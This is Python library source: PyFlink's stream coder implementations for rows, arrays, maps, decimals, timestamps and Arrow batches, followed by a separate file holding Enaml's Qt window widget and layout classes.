# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
import datetime
import decimal
import pickle
import struct
from typing import Any, Tuple
from typing import List
import pyarrow as pa
from apache_beam.coders.coder_impl import StreamCoderImpl, create_InputStream, create_OutputStream
from pyflink.fn_execution.ResettableIO import ResettableIO
from pyflink.common import Row, RowKind
from pyflink.table.utils import pandas_to_arrow, arrow_to_pandas
# Number of leading bitmap bits reserved for the row kind (see RowSerializer).
ROW_KIND_BIT_SIZE = 2
class FlattenRowCoderImpl(StreamCoderImpl):
    """Coder for a flattened row.

    Wire format per row: a header bitmap whose first ROW_KIND_BIT_SIZE bits
    encode the row kind and whose remaining bits flag null fields, followed
    by the non-null field values encoded by the per-field coders. The
    top-level encode additionally prefixes each row with its var-int length.
    """

    def __init__(self, field_coders):
        self._field_coders = field_coders
        self._field_count = len(field_coders)
        # the row kind uses the first 2 bits of the bitmap, the remaining bits are used for null
        # mask, for more details refer to:
        # https://github.com/apache/flink/blob/master/flink-core/src/main/java/org/apache/flink/api/java/typeutils/runtime/RowSerializer.java
        self._leading_complete_bytes_num = (self._field_count + ROW_KIND_BIT_SIZE) // 8
        self._remaining_bits_num = (self._field_count + ROW_KIND_BIT_SIZE) % 8
        # 256-entry lookup: byte value -> 8-tuple of null flags (MSB first).
        self.null_mask_search_table = self.generate_null_mask_search_table()
        self.null_byte_search_table = (0x80, 0x40, 0x20, 0x10, 0x08, 0x04, 0x02, 0x01)
        # Bit patterns for row kinds 0..3 in the two high bits of byte 0.
        self.row_kind_search_table = [0x00, 0x80, 0x40, 0xC0]
        # Reusable scratch buffer so encoding doesn't allocate per row.
        self.data_out_stream = create_OutputStream()

    @staticmethod
    def generate_null_mask_search_table():
        """
        Each bit of one byte represents if the column at the corresponding position is None or not,
        e.g. 0x84 represents the first column and the sixth column are None.
        """
        null_mask = []
        for b in range(256):
            every_num_null_mask = [(b & 0x80) > 0, (b & 0x40) > 0, (b & 0x20) > 0, (b & 0x10) > 0,
                                   (b & 0x08) > 0, (b & 0x04) > 0, (b & 0x02) > 0, (b & 0x01) > 0]
            null_mask.append(tuple(every_num_null_mask))

        return tuple(null_mask)

    def encode_to_stream(self, value, out_stream, nested):
        # Write the row to the scratch stream first so its byte size can be
        # emitted as a var-int length prefix. Row kind is not encoded here
        # (the header always carries kind 0).
        field_coders = self._field_coders
        data_out_stream = self.data_out_stream
        self._write_mask(value, data_out_stream)
        for i in range(self._field_count):
            item = value[i]
            if item is not None:
                field_coders[i].encode_to_stream(item, data_out_stream, nested)
        out_stream.write_var_int64(data_out_stream.size())
        out_stream.write(data_out_stream.get())
        data_out_stream._clear()

    def encode_nested(self, value: List):
        # Encode one row (with row kind if `value` is a Row) and return the
        # raw bytes instead of writing to an external stream.
        data_out_stream = self.data_out_stream
        self._encode_one_row_to_stream(value, data_out_stream, True)
        result = data_out_stream.get()
        data_out_stream._clear()
        return result

    def decode_from_stream(self, in_stream, nested):
        # Generator: yields the field list of each row until the stream is
        # exhausted; the var-int length prefix is read and discarded.
        while in_stream.size() > 0:
            in_stream.read_var_int64()
            yield self._decode_one_row_from_stream(in_stream, nested)[1]

    def _encode_one_row_to_stream(self, value, out_stream, nested):
        field_coders = self._field_coders
        if isinstance(value, Row):
            # Only Row values carry an explicit row kind; plain sequences
            # default to kind 0 (INSERT).
            self._write_mask(value, out_stream, value.get_row_kind().value)
        else:
            self._write_mask(value, out_stream)
        for i in range(self._field_count):
            item = value[i]
            if item is not None:
                field_coders[i].encode_to_stream(item, out_stream, nested)

    def _decode_one_row_from_stream(
            self, in_stream: create_InputStream, nested: bool) -> Tuple[int, List]:
        # Returns (row_kind_value, fields); null-flagged fields decode to None.
        row_kind_and_null_mask = self._read_mask(in_stream)
        row_kind_value = 0
        # Reassemble the row kind from its bits (mask[0] is the 2**0 bit,
        # matching row_kind_search_table's bit layout).
        for i in range(ROW_KIND_BIT_SIZE):
            row_kind_value += int(row_kind_and_null_mask[i]) * 2 ** i
        return row_kind_value, [None if row_kind_and_null_mask[idx + ROW_KIND_BIT_SIZE] else
                                self._field_coders[idx].decode_from_stream(
                                    in_stream, nested) for idx in range(0, self._field_count)]

    def _write_mask(self, value, out_stream, row_kind_value=0):
        field_pos = 0
        null_byte_search_table = self.null_byte_search_table
        remaining_bits_num = self._remaining_bits_num

        # first byte contains the row kind bits
        b = self.row_kind_search_table[row_kind_value]

        # The remaining 6 bits of the first byte flag the first (up to) 6 fields.
        for i in range(0, 8 - ROW_KIND_BIT_SIZE):
            if field_pos + i < len(value) and value[field_pos + i] is None:
                b |= null_byte_search_table[i + ROW_KIND_BIT_SIZE]
        field_pos += 8 - ROW_KIND_BIT_SIZE
        out_stream.write_byte(b)

        # Complete bytes of 8 null flags each (byte 0 already written above).
        for _ in range(1, self._leading_complete_bytes_num):
            b = 0x00
            for i in range(0, 8):
                if value[field_pos + i] is None:
                    b |= null_byte_search_table[i]
            field_pos += 8
            out_stream.write_byte(b)

        # Trailing partial byte — only needed once the first byte overflowed
        # (when leading_complete_bytes_num is 0 the remaining bits already
        # fit into byte 0 above).
        if self._leading_complete_bytes_num >= 1 and remaining_bits_num:
            b = 0x00
            for i in range(remaining_bits_num):
                if value[field_pos + i] is None:
                    b |= null_byte_search_table[i]
            out_stream.write_byte(b)

    def _read_mask(self, in_stream):
        # Inverse of _write_mask: returns a flat list of bits (row kind bits
        # first, then one null flag per field).
        mask = []
        mask_search_table = self.null_mask_search_table
        remaining_bits_num = self._remaining_bits_num
        for _ in range(self._leading_complete_bytes_num):
            b = in_stream.read_byte()
            mask.extend(mask_search_table[b])

        if remaining_bits_num:
            b = in_stream.read_byte()
            mask.extend(mask_search_table[b][0:remaining_bits_num])
        return mask

    def __repr__(self):
        return 'FlattenRowCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class RowCoderImpl(FlattenRowCoderImpl):
    """Flatten-row coder that materializes decoded rows as `Row` objects,
    restoring field names and the row kind (no var-int length prefix)."""

    def __init__(self, field_coders, field_names):
        super(RowCoderImpl, self).__init__(field_coders)
        self.field_names = field_names

    def encode_to_stream(self, value: Row, out_stream, nested):
        self._encode_one_row_to_stream(value, out_stream, nested)

    def decode_from_stream(self, in_stream, nested):
        row_kind_value, fields = self._decode_one_row_from_stream(in_stream, nested)
        row = Row(*fields)
        row.set_field_names(self.field_names)
        row.set_row_kind(RowKind(row_kind_value))
        return row

    def __repr__(self):
        return 'RowCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class TableFunctionRowCoderImpl(StreamCoderImpl):
    """Coder for table-function results: every produced row is encoded with
    the flatten-row coder, then a trailing 0x00 marks end-of-results."""

    def __init__(self, flatten_row_coder):
        self._flatten_row_coder = flatten_row_coder
        self._field_count = flatten_row_coder._field_count

    def encode_to_stream(self, iter_value, out_stream, nested):
        wrapped_single = False
        if iter_value:
            # a bare Row/tuple result is treated as a one-element iterable
            if isinstance(iter_value, (tuple, Row)):
                iter_value = [iter_value]
                wrapped_single = True
            for item in iter_value:
                # scalar results of a single-field function are wrapped so the
                # flatten-row coder always sees a sequence
                if self._field_count == 1 and not wrapped_single:
                    item = (item,)
                self._flatten_row_coder.encode_to_stream(item, out_stream, nested)
        # end-of-results marker, written even for an empty result
        out_stream.write_var_int64(1)
        out_stream.write_byte(0x00)

    def decode_from_stream(self, in_stream, nested):
        return self._flatten_row_coder.decode_from_stream(in_stream, nested)

    def __repr__(self):
        return 'TableFunctionRowCoderImpl[%s]' % repr(self._flatten_row_coder)
class AggregateFunctionRowCoderImpl(StreamCoderImpl):
    """
    Coder for aggregate-function results. Like the table-function coder, one
    input message may produce several output rows (e.g. one INSERT producing
    an UPDATE_BEFORE plus an UPDATE_AFTER), but here the row kind is encoded
    into each output row and no end-of-output marker is written.
    """

    def __init__(self, flatten_row_coder):
        self._flatten_row_coder = flatten_row_coder
        self._data_out_stream = create_OutputStream()

    def encode_to_stream(self, iter_value, out_stream, nested):
        buffer_stream = self._data_out_stream
        for row in iter_value:
            self._flatten_row_coder._encode_one_row_to_stream(row, buffer_stream, nested)
            # length-prefix each row so the reader can frame it
            out_stream.write_var_int64(buffer_stream.size())
            out_stream.write(buffer_stream.get())
            buffer_stream._clear()

    def decode_from_stream(self, in_stream, nested):
        return [list(self._flatten_row_coder.decode_from_stream(in_stream, nested))]

    def __repr__(self):
        return 'AggregateFunctionRowCoderImpl[%s]' % repr(self._flatten_row_coder)
class BasicArrayCoderImpl(StreamCoderImpl):
    """Coder for arrays whose elements may be null: the length, then one
    presence byte per element followed by the element payload when present."""

    def __init__(self, elem_coder):
        self._elem_coder = elem_coder

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(len(value))
        for item in value:
            present = item is not None
            out_stream.write_byte(present)
            if present:
                self._elem_coder.encode_to_stream(item, out_stream, nested)

    def decode_from_stream(self, in_stream, nested):
        length = in_stream.read_bigendian_int32()
        decode = self._elem_coder.decode_from_stream
        return [decode(in_stream, nested) if in_stream.read_byte() else None
                for _ in range(length)]

    def __repr__(self):
        return 'BasicArrayCoderImpl[%s]' % repr(self._elem_coder)
class PrimitiveArrayCoderImpl(StreamCoderImpl):
    """Coder for primitive arrays: elements cannot be null, so no per-element
    presence byte is written."""

    def __init__(self, elem_coder):
        self._elem_coder = elem_coder

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(len(value))
        encode = self._elem_coder.encode_to_stream
        for item in value:
            encode(item, out_stream, nested)

    def decode_from_stream(self, in_stream, nested):
        decode = self._elem_coder.decode_from_stream
        return [decode(in_stream, nested)
                for _ in range(in_stream.read_bigendian_int32())]

    def __repr__(self):
        return 'PrimitiveArrayCoderImpl[%s]' % repr(self._elem_coder)
class PickledBytesCoderImpl(StreamCoderImpl):
    """Coder that pickles arbitrary Python objects and frames the pickle
    payload with the binary coder's length prefix."""

    def __init__(self):
        self.field_coder = BinaryCoderImpl()

    def encode_to_stream(self, value, out_stream, nested):
        self.field_coder.encode_to_stream(pickle.dumps(value), out_stream, nested)

    def decode_from_stream(self, in_stream, nested):
        return self._decode_one_value_from_stream(in_stream, nested)

    def _decode_one_value_from_stream(self, in_stream: create_InputStream, nested):
        # NOTE: pickle.loads on untrusted input is unsafe; this assumes the
        # peer is the trusted Flink runtime
        return pickle.loads(self.field_coder.decode_from_stream(in_stream, nested))

    def __repr__(self) -> str:
        return 'PickledBytesCoderImpl[%s]' % str(self.field_coder)
class DataStreamMapCoderImpl(StreamCoderImpl):
    """Length-prefixed coder used for DataStream map transformations."""

    def __init__(self, field_coder):
        self._field_coder = field_coder
        self.data_out_stream = create_OutputStream()

    def encode_to_stream(self, value, stream,
                         nested):  # type: (Any, create_OutputStream, bool) -> None
        buffered = self.data_out_stream
        self._field_coder.encode_to_stream(value, buffered, nested)
        # prefix the record with its byte size so the consumer can frame it
        stream.write_var_int64(buffered.size())
        stream.write(buffered.get())
        buffered._clear()

    def decode_from_stream(self, stream, nested):  # type: (create_InputStream, bool) -> Any
        while stream.size() > 0:
            stream.read_var_int64()  # skip the length prefix
            yield self._field_coder.decode_from_stream(stream, nested)

    def __repr__(self):
        return 'DataStreamMapCoderImpl[%s]' % repr(self._field_coder)
class DataStreamFlatMapCoderImpl(StreamCoderImpl):
    """Coder for flat-map results: encodes every produced value and then a
    terminator byte."""

    def __init__(self, field_coder):
        self._field_coder = field_coder

    def encode_to_stream(self, iter_value, stream,
                         nested):  # type: (Any, create_OutputStream, bool) -> None
        if iter_value:
            for item in iter_value:
                self._field_coder.encode_to_stream(item, stream, nested)
        # end-of-results marker, written even when there is no result
        stream.write_var_int64(1)
        stream.write_byte(0x00)

    def decode_from_stream(self, stream, nested):
        return self._field_coder.decode_from_stream(stream, nested)

    def __str__(self) -> str:
        return 'DataStreamFlatMapCoderImpl[%s]' % repr(self._field_coder)
class DataStreamCoFlatMapCoderImpl(StreamCoderImpl):
    """Coder for co-flat-map results; unlike the flat-map coder, no
    terminator byte is written."""

    def __init__(self, field_coder):
        self._field_coder = field_coder

    def encode_to_stream(self, iter_value, stream,
                         nested):  # type: (Any, create_OutputStream, bool) -> None
        encode = self._field_coder.encode_to_stream
        for item in iter_value:
            encode(item, stream, nested)

    def decode_from_stream(self, stream, nested):
        return self._field_coder.decode_from_stream(stream, nested)

    def __str__(self) -> str:
        return 'DataStreamCoFlatMapCoderImpl[%s]' % repr(self._field_coder)
class MapCoderImpl(StreamCoderImpl):
    """Coder for maps: the entry count, then key/value pairs where each value
    is preceded by a null-marker byte."""

    def __init__(self, key_coder, value_coder):
        self._key_coder = key_coder
        self._value_coder = value_coder

    def encode_to_stream(self, map_value, out_stream, nested):
        out_stream.write_bigendian_int32(len(map_value))
        for key, item in map_value.items():
            self._key_coder.encode_to_stream(key, out_stream, nested)
            is_null = item is None
            out_stream.write_byte(is_null)
            if not is_null:
                self._value_coder.encode_to_stream(item, out_stream, nested)

    def decode_from_stream(self, in_stream, nested):
        result = {}
        for _ in range(in_stream.read_bigendian_int32()):
            key = self._key_coder.decode_from_stream(in_stream, nested)
            if in_stream.read_byte():
                result[key] = None
            else:
                result[key] = self._value_coder.decode_from_stream(in_stream, nested)
        return result

    def __repr__(self):
        return 'MapCoderImpl[%s]' % ' : '.join([repr(self._key_coder), repr(self._value_coder)])
class BigIntCoderImpl(StreamCoderImpl):
    """Coder for BIGINT values: 8-byte big-endian signed integers."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int64(value)

    def decode_from_stream(self, in_stream, nested):
        return in_stream.read_bigendian_int64()
class TinyIntCoderImpl(StreamCoderImpl):
    """Coder for TINYINT values: a single signed byte."""

    # precompiled format avoids re-parsing the format string per value
    _STRUCT = struct.Struct('b')

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write(self._STRUCT.pack(value))

    def decode_from_stream(self, in_stream, nested):
        return self._STRUCT.unpack(in_stream.read(1))[0]
class SmallIntCoderImpl(StreamCoderImpl):
    """Coder for SMALLINT values: 2-byte big-endian signed integers."""

    # precompiled format avoids re-parsing the format string per value
    _STRUCT = struct.Struct('>h')

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write(self._STRUCT.pack(value))

    def decode_from_stream(self, in_stream, nested):
        return self._STRUCT.unpack(in_stream.read(2))[0]
class IntCoderImpl(StreamCoderImpl):
    """Coder for INT values: 4-byte big-endian signed integers."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(value)

    def decode_from_stream(self, in_stream, nested):
        return in_stream.read_bigendian_int32()
class BooleanCoderImpl(StreamCoderImpl):
    """Coder for BOOLEAN values, stored as a single byte."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_byte(value)

    def decode_from_stream(self, in_stream, nested):
        return bool(in_stream.read_byte())
class FloatCoderImpl(StreamCoderImpl):
    """Coder for FLOAT values: 4-byte big-endian IEEE-754 floats."""

    # precompiled format avoids re-parsing the format string per value
    _STRUCT = struct.Struct('>f')

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write(self._STRUCT.pack(value))

    def decode_from_stream(self, in_stream, nested):
        return self._STRUCT.unpack(in_stream.read(4))[0]
class DoubleCoderImpl(StreamCoderImpl):
    """Coder for DOUBLE values: 8-byte big-endian IEEE-754 doubles."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_double(value)

    def decode_from_stream(self, in_stream, nested):
        return in_stream.read_bigendian_double()
class DecimalCoderImpl(StreamCoderImpl):
    """Coder for DECIMAL(precision, scale) values.

    Values are quantized to the declared scale under a decimal context with
    the declared precision, then written as a length-prefixed UTF-8 string.
    """

    def __init__(self, precision, scale):
        self.context = decimal.Context(prec=precision)
        self.scale_format = decimal.Decimal(10) ** -scale

    def encode_to_stream(self, value, out_stream, nested):
        user_context = decimal.getcontext()
        decimal.setcontext(self.context)
        try:
            value = value.quantize(self.scale_format)
            bytes_value = str(value).encode("utf-8")
            out_stream.write_bigendian_int32(len(bytes_value))
            out_stream.write(bytes_value, False)
        finally:
            # always restore the caller's context, even when quantize raises
            # (e.g. InvalidOperation on precision overflow); the original code
            # leaked self.context into the caller's thread on error
            decimal.setcontext(user_context)

    def decode_from_stream(self, in_stream, nested):
        user_context = decimal.getcontext()
        decimal.setcontext(self.context)
        try:
            size = in_stream.read_bigendian_int32()
            return decimal.Decimal(
                in_stream.read(size).decode("utf-8")).quantize(self.scale_format)
        finally:
            decimal.setcontext(user_context)
class BigDecimalCoderImpl(StreamCoderImpl):
    """Coder for arbitrary-precision decimals, framed as length-prefixed
    UTF-8 text."""

    def encode_to_stream(self, value, stream, nested):
        encoded = str(value).encode("utf-8")
        stream.write_bigendian_int32(len(encoded))
        stream.write(encoded, False)

    def decode_from_stream(self, stream, nested):
        length = stream.read_bigendian_int32()
        return decimal.Decimal(stream.read(length).decode("utf-8"))
class TupleCoderImpl(StreamCoderImpl):
    """Coder for fixed-length tuples, one sub-coder per position."""

    def __init__(self, field_coders):
        self._field_coders = field_coders
        self._field_count = len(field_coders)

    def encode_to_stream(self, value, out_stream, nested):
        for position, coder in enumerate(self._field_coders):
            coder.encode_to_stream(value[position], out_stream, nested)

    def decode_from_stream(self, stream, nested):
        return tuple(coder.decode_from_stream(stream, nested)
                     for coder in self._field_coders)

    def __repr__(self) -> str:
        return 'TupleCoderImpl[%s]' % ', '.join(str(c) for c in self._field_coders)
class BinaryCoderImpl(StreamCoderImpl):
    """Coder for raw bytes, framed with a big-endian int32 length prefix."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(len(value))
        out_stream.write(value, False)

    def decode_from_stream(self, in_stream, nested):
        size = in_stream.read_bigendian_int32()
        return in_stream.read(size)
class CharCoderImpl(StreamCoderImpl):
    """Coder for character strings, stored as length-prefixed UTF-8 bytes."""

    def encode_to_stream(self, value, out_stream, nested):
        encoded = value.encode("utf-8")
        out_stream.write_bigendian_int32(len(encoded))
        out_stream.write(encoded, False)

    def decode_from_stream(self, in_stream, nested):
        length = in_stream.read_bigendian_int32()
        return in_stream.read(length).decode("utf-8")
class DateCoderImpl(StreamCoderImpl):
    """Coder for DATE values, stored as days since the Unix epoch (int32)."""

    EPOCH_ORDINAL = datetime.datetime(1970, 1, 1).toordinal()

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(self.date_to_internal(value))

    def decode_from_stream(self, in_stream, nested):
        return self.internal_to_date(in_stream.read_bigendian_int32())

    def date_to_internal(self, d):
        # days relative to 1970-01-01
        return d.toordinal() - self.EPOCH_ORDINAL

    def internal_to_date(self, v):
        return datetime.date.fromordinal(v + self.EPOCH_ORDINAL)
class TimeCoderImpl(StreamCoderImpl):
    """Coder for TIME values, stored as milliseconds since midnight (int32)."""

    def encode_to_stream(self, value, out_stream, nested):
        out_stream.write_bigendian_int32(self.time_to_internal(value))

    def decode_from_stream(self, in_stream, nested):
        return self.internal_to_time(in_stream.read_bigendian_int32())

    def time_to_internal(self, t):
        # sub-millisecond precision is truncated
        return ((t.hour * 60 + t.minute) * 60 + t.second) * 1000 + t.microsecond // 1000

    def internal_to_time(self, v):
        total_seconds, millis = divmod(v, 1000)
        total_minutes, secs = divmod(total_seconds, 60)
        hrs, mins = divmod(total_minutes, 60)
        return datetime.time(hrs, mins, secs, millis * 1000)
class TimestampCoderImpl(StreamCoderImpl):
    """Coder for TIMESTAMP values.

    Precision <= 3 uses the compact form (milliseconds only); otherwise a
    nanosecond remainder is written after the millisecond part.
    """

    def __init__(self, precision):
        self.precision = precision

    def is_compact(self):
        return self.precision <= 3

    def encode_to_stream(self, value, out_stream, nested):
        milliseconds, nanoseconds = self.timestamp_to_internal(value)
        if self.is_compact():
            assert nanoseconds == 0
            out_stream.write_bigendian_int64(milliseconds)
        else:
            out_stream.write_bigendian_int64(milliseconds)
            out_stream.write_bigendian_int32(nanoseconds)

    def decode_from_stream(self, in_stream, nested):
        milliseconds = in_stream.read_bigendian_int64()
        nanoseconds = 0 if self.is_compact() else in_stream.read_bigendian_int32()
        return self.internal_to_timestamp(milliseconds, nanoseconds)

    def timestamp_to_internal(self, timestamp):
        # the naive datetime is interpreted as UTC
        epoch_seconds = int(timestamp.replace(tzinfo=datetime.timezone.utc).timestamp())
        micros = timestamp.microsecond
        return epoch_seconds * 1000 + micros // 1000, micros % 1000 * 1000

    def internal_to_timestamp(self, milliseconds, nanoseconds):
        seconds, remainder_millis = divmod(milliseconds, 1000)
        microsecond = remainder_millis * 1000 + nanoseconds // 1000
        return datetime.datetime.utcfromtimestamp(seconds).replace(microsecond=microsecond)
class LocalZonedTimestampCoderImpl(TimestampCoderImpl):
    """Timestamp coder that localizes decoded values to a fixed timezone."""

    def __init__(self, precision, timezone):
        super(LocalZonedTimestampCoderImpl, self).__init__(precision)
        self.timezone = timezone

    def internal_to_timestamp(self, milliseconds, nanoseconds):
        naive = super(LocalZonedTimestampCoderImpl, self).internal_to_timestamp(
            milliseconds, nanoseconds)
        return self.timezone.localize(naive)
class ArrowCoderImpl(StreamCoderImpl):
    """Coder for column batches in the Arrow IPC streaming format.

    A single ``ResettableIO`` is shared between both directions: for writing,
    its output is redirected into ``data_out_stream`` so each Arrow batch can
    be length-prefixed; for reading, the raw bytes of one batch are injected
    and consumed by the lazily-advanced ``_batch_reader`` generator.
    """

    def __init__(self, schema, row_type, timezone):
        self._schema = schema
        self._field_types = row_type.field_types()
        self._timezone = timezone
        self._resettable_io = ResettableIO()
        # generator yielding one Arrow record batch per injected payload
        self._batch_reader = ArrowCoderImpl._load_from_stream(self._resettable_io)
        self.data_out_stream = create_OutputStream()
        self._resettable_io.set_output_stream(self.data_out_stream)

    def encode_to_stream(self, cols, out_stream, nested):
        data_out_stream = self.data_out_stream
        # the writer targets _resettable_io, which forwards to data_out_stream
        batch_writer = pa.RecordBatchStreamWriter(self._resettable_io, self._schema)
        batch_writer.write_batch(
            pandas_to_arrow(self._schema, self._timezone, self._field_types, cols))
        # frame the batch with its byte size so the reader can split batches
        out_stream.write_var_int64(data_out_stream.size())
        out_stream.write(data_out_stream.get())
        data_out_stream._clear()

    def decode_from_stream(self, in_stream, nested):
        # one length-prefixed Arrow batch per iteration
        while in_stream.size() > 0:
            yield self._decode_one_batch_from_stream(in_stream, in_stream.read_var_int64())

    @staticmethod
    def _load_from_stream(stream):
        # re-open the IPC stream for every batch: each injected payload is a
        # complete, self-contained Arrow stream
        while stream.readable():
            reader = pa.ipc.open_stream(stream)
            yield reader.read_next_batch()

    def _decode_one_batch_from_stream(self, in_stream: create_InputStream, size: int) -> List:
        self._resettable_io.set_input_bytes(in_stream.read(size))
        # there is only one arrow batch in the underlying input stream
        return arrow_to_pandas(self._timezone, self._field_types, [next(self._batch_reader)])

    def __repr__(self):
        return 'ArrowCoderImpl[%s]' % self._schema
class OverWindowArrowCoderImpl(StreamCoderImpl):
    """Coder for OVER-window data: each frame carries a window count, the
    boundary indexes of every window, and finally one Arrow batch holding
    the actual rows.
    """

    def __init__(self, arrow_coder):
        self._arrow_coder = arrow_coder
        self._int_coder = IntCoderImpl()

    def encode_to_stream(self, value, stream, nested):
        # encoding adds no window metadata; delegate to the arrow coder
        self._arrow_coder.encode_to_stream(value, stream, nested)

    def decode_from_stream(self, in_stream, nested):
        while in_stream.size():
            # total byte size of this frame; every int32 consumed below
            # reduces what remains for the trailing arrow batch
            remaining_size = in_stream.read_var_int64()
            window_num = self._int_coder.decode_from_stream(in_stream, nested)
            remaining_size -= 4
            window_boundaries_and_arrow_data = []
            for _ in range(window_num):
                window_size = self._int_coder.decode_from_stream(in_stream, nested)
                remaining_size -= 4
                window_boundaries_and_arrow_data.append(
                    [self._int_coder.decode_from_stream(in_stream, nested)
                     for _ in range(window_size)])
                remaining_size -= 4 * window_size
            # whatever is left of the frame is the serialized arrow batch
            window_boundaries_and_arrow_data.append(
                self._arrow_coder._decode_one_batch_from_stream(in_stream, remaining_size))
            yield window_boundaries_and_arrow_data

    def __repr__(self):
        return 'OverWindowArrowCoderImpl[%s]' % self._arrow_coder
class PassThroughLengthPrefixCoderImpl(StreamCoderImpl):
    """Coder that simply delegates to the wrapped value coder; no actual
    length prefix is written or consumed."""

    def __init__(self, value_coder):
        self._value_coder = value_coder

    def encode_to_stream(self, value, out: create_OutputStream, nested: bool) -> Any:
        self._value_coder.encode_to_stream(value, out, nested)

    def decode_from_stream(self, in_stream: create_InputStream, nested: bool) -> Any:
        return self._value_coder.decode_from_stream(in_stream, nested)

    def get_estimated_size_and_observables(self, value: Any, nested=False):
        # size estimation is unsupported; report zero bytes and no observables
        return 0, []

    def __repr__(self):
        return 'PassThroughLengthPrefixCoderImpl[%s]' % self._value_coder
|
|
#------------------------------------------------------------------------------
# Copyright (c) 2013, Nucleic Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#------------------------------------------------------------------------------
from atom.api import Typed
from enaml.layout.geometry import Pos, Rect, Size
from enaml.widgets.window import ProxyWindow
from .QtCore import Qt, QPoint, QRect, QSize, Signal
from .QtGui import QApplication, QFrame, QLayout, QIcon
from .q_resource_helpers import get_cached_qicon
from .q_single_widget_layout import QSingleWidgetLayout
from .qt_container import QtContainer
from .qt_widget import QtWidget
#: Map from Enaml modality strings to the corresponding Qt window
#: modality enum values.
MODALITY = {
    'non_modal': Qt.NonModal,
    'application_modal': Qt.ApplicationModal,
    'window_modal': Qt.WindowModal,
}
class QWindowLayout(QSingleWidgetLayout):
    """ A QSingleWidgetLayout subclass which adds support for windows
    which explicitly set their minimum and maximum sizes.

    """
    def minimumSize(self):
        """ Compute the minimum size of the layout area.

        Reimplemented to honor an explicitly provided minimum size on
        the parent window, when one has been set.

        """
        window = self.parentWidget()
        if window is not None:
            explicit = window.explicitMinimumSize()
            if explicit.isValid():
                return explicit
        return super(QWindowLayout, self).minimumSize()

    def maximumSize(self):
        """ Compute the maximum size of the layout area.

        Reimplemented to honor an explicitly provided maximum size on
        the parent window, when one has been set.

        """
        window = self.parentWidget()
        if window is not None:
            explicit = window.explicitMaximumSize()
            if explicit.isValid():
                return explicit
        return super(QWindowLayout, self).maximumSize()
class QWindow(QFrame):
    """ A custom QFrame which uses a QWindowLayout to manage its
    central widget.

    Unless the user explicitly overrides them, the window's min/max
    sizes are computed by the layout from its central widget.

    """
    #: A signal emitted when the window is closed.
    closed = Signal()

    def __init__(self, parent=None):
        """ Initialize a QWindow.

        Parameters
        ----------
        parent : QWidget, optional
            The parent widget of the window, or None.

        """
        super(QWindow, self).__init__(parent, Qt.Window)
        self._central_widget = None
        self._expl_min_size = QSize()
        self._expl_max_size = QSize()
        layout = QWindowLayout()
        layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
        self.setLayout(layout)

    def closeEvent(self, event):
        """ Handle a QCloseEvent from the window system.

        The superclass handler runs first to close the window, after
        which the 'closed' signal is emitted.

        """
        super(QWindow, self).closeEvent(event)
        self.closed.emit()

    def centralWidget(self):
        """ Get the central widget installed on the window.

        Returns
        -------
        result : QWidget or None
            The central widget of the window, or None if none was set.

        """
        return self._central_widget

    def setCentralWidget(self, widget):
        """ Install a central widget on the window.

        Parameters
        ----------
        widget : QWidget
            The widget to use as the content of the window.

        """
        self._central_widget = widget
        self.layout().setWidget(widget)

    def explicitMinimumSize(self):
        """ Get the explicitly set minimum size of the window.

        Returns
        -------
        result : QSize
            The user-provided minimum size if one was set, otherwise
            an invalid QSize.

        """
        return self._expl_min_size

    def explicitMaximumSize(self):
        """ Get the explicitly set maximum size of the window.

        Returns
        -------
        result : QSize
            The user-provided maximum size if one was set, otherwise
            an invalid QSize.

        """
        return self._expl_max_size

    def setMinimumSize(self, size):
        """ Set the minimum size of the QWindow.

        Overridden to record the size as explicitly provided. Passing
        QSize(0, 0) resets the explicit minimum size.

        Parameters
        ----------
        size : QSize
            The minimum size for the QWindow.

        """
        super(QWindow, self).setMinimumSize(size)
        self._expl_min_size = QSize() if size == QSize(0, 0) else size
        self.layout().update()

    def setMaximumSize(self, size):
        """ Set the maximum size of the QWindow.

        Overridden to record the size as explicitly provided. Passing
        QSize(16777215, 16777215), the maximum widget size, resets the
        explicit maximum size.

        Parameters
        ----------
        size : QSize
            The maximum size for the QWindow.

        """
        super(QWindow, self).setMaximumSize(size)
        self._expl_max_size = QSize() if size == QSize(16777215, 16777215) else size
        self.layout().update()
class QtWindow(QtWidget, ProxyWindow):
    """ A Qt implementation of an Enaml ProxyWindow.

    """
    #: A reference to the toolkit widget created by the proxy.
    widget = Typed(QWindow)

    #--------------------------------------------------------------------------
    # Initialization API
    #--------------------------------------------------------------------------
    def create_widget(self):
        """ Create the underlying QWindow widget.

        """
        self.widget = QWindow(self.parent_widget())

    def init_widget(self):
        """ Initialize the underlying widget from the declaration.

        """
        super(QtWindow, self).init_widget()
        d = self.declaration
        if d.title:
            self.set_title(d.title)
        if -1 not in d.initial_size:
            self.widget.resize(*d.initial_size)
        if -1 not in d.initial_position:
            self.widget.move(*d.initial_position)
        if d.modality != 'non_modal':
            self.set_modality(d.modality)
        if d.icon:
            self.set_icon(d.icon)
        self.widget.closed.connect(self.on_closed)

    def init_layout(self):
        """ Initialize the layout of the underlying widget.

        """
        super(QtWindow, self).init_layout()
        self.widget.setCentralWidget(self.central_widget())

    #--------------------------------------------------------------------------
    # Public API
    #--------------------------------------------------------------------------
    def central_widget(self):
        """ Find and return the central widget child for this widget.

        Returns
        -------
        result : QWidget or None
            The central widget defined for this widget, or None if one
            is not defined.

        """
        d = self.declaration.central_widget()
        if d is None:
            return None
        return d.proxy.widget

    def on_closed(self):
        """ Handle the 'closed' signal from the QWindow.

        This fires the close handler on the declaration object.

        """
        self.declaration._handle_close()

